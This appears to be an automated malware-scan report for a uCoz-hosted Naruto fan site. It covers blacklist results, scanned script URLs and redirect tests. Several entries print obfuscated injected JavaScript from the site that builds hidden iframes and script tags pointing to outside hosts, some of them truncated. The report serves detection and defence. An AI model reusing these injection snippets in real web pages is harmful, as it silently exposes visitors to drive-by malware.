Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=naruto-planett.ucoz.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://naruto-planett.ucoz.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://naruto-planett.ucoz.ru/ | 200 OK Content-Length: 83524 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var d = document; var understoodhd = d.getElementsByTagName('he' + 'ad')[0]; var overprizetag = d.createElement('ifr' + 'ame'); overprizetag.src = 'ht' + 'tp://' + vr.split('$').reverse().join('.') + '/?in=56026'; understoodhd.appendChild(overprizetag); | ||
http://userapi.com/js/api/openapi.js?48 | 200 OK Content-Length: 64013 Content-Type: application/x-javascript | clean |
http://gocash2.ru3.biz/js/back.php?id=54 | 200 OK Content-Length: 272 Content-Type: text/html | clean |
http://gocash2.ru3.biz/test404page.js | 200 OK Content-Length: 271 Content-Type: text/html | clean |
http://s48.ucoz.net/src/jquery-1.7.2.js | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://s48.ucoz.net/src/ulightbox/ulightbox.js | 200 OK Content-Length: 22097 Content-Type: text/javascript | clean |
http://s48.ucoz.net/src/uwnd.js?2 | 200 OK Content-Length: 228554 Content-Type: text/javascript | clean |
http://csomsk.ru/js/hint.js | 200 OK Content-Length: 3953 Content-Type: text/javascript | clean |
http://understood.looker9.ru/overprize.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://midlemee.ru/6peybjqhc7t3kh4qjwi | 200 OK Content-Length: 10128 Content-Type: text/javascript | suspicious |
Suspicious code. Script contains iFrame. document.write("");function Rqy365(src, into_element, callback, attrs) { document.write('<scr' + 'ipt type="text/javascript" src="' + src + '"></scr' + 'ipt>'); callback(); } function c575(Vjy274, G767) { var fr = ['i', 'f', 'r', 'a', 'm', 'e']; var name = fr[0] + fr[1] + fr[2] + fr[3] + fr[4] + fr[5]; var Y267 = document.createElement('div'); var FI52 = document.createElement(name); FI52.src = Vjy274; Y267.style.cssText = 'position:abs ...[3603 bytes skipped]... | ||
http://c.am11.ru/code/bn/js.php?u=20913&f=3 | 200 OK Content-Length: 266 Content-Type: text/javascript | clean |
http://midlemee.ru/7uzkku3gfmh5jv6vjfz3mc11uez0omdx | 200 OK Content-Length: 10150 Content-Type: text/javascript | suspicious |
Suspicious code. Script contains iFrame. document.write("");function E741(src, into_element, callback, attrs) { document.write('<scr' + 'ipt type="text/javascript" src="' + src + '"></scr' + 'ipt>'); callback(); } function mF952(J78, HV286) { var fr = ['i', 'f', 'r', 'a', 'm', 'e']; var name = fr[0] + fr[1] + fr[2] + fr[3] + fr[4] + fr[5]; var G867 = document.createElement('div'); var yL837 = document.createElement(name); yL837.src = J78; G867.style.cssText = 'position:absolut ...[3603 bytes skipped]... |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: naruto-planett.ucoz.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Nov 2014 04:59:59 GMT
Server: uServ/3.2.2
Content-Length: 83524
Content-Type: text/html; charset=UTF-8
...83524 bytes of data.
GET / HTTP/1.1
Host: naruto-planett.ucoz.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Nov 2014 04:59:59 GMT
Server: uServ/3.2.2
Content-Length: 83524
Content-Type: text/html; charset=UTF-8
...83524 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: naruto-planett.ucoz.ru
Referer: http://www.google.com/search?q=naruto-planett.ucoz.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: naruto-planett.ucoz.ru
Referer: http://www.google.com/search?q=naruto-planett.ucoz.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.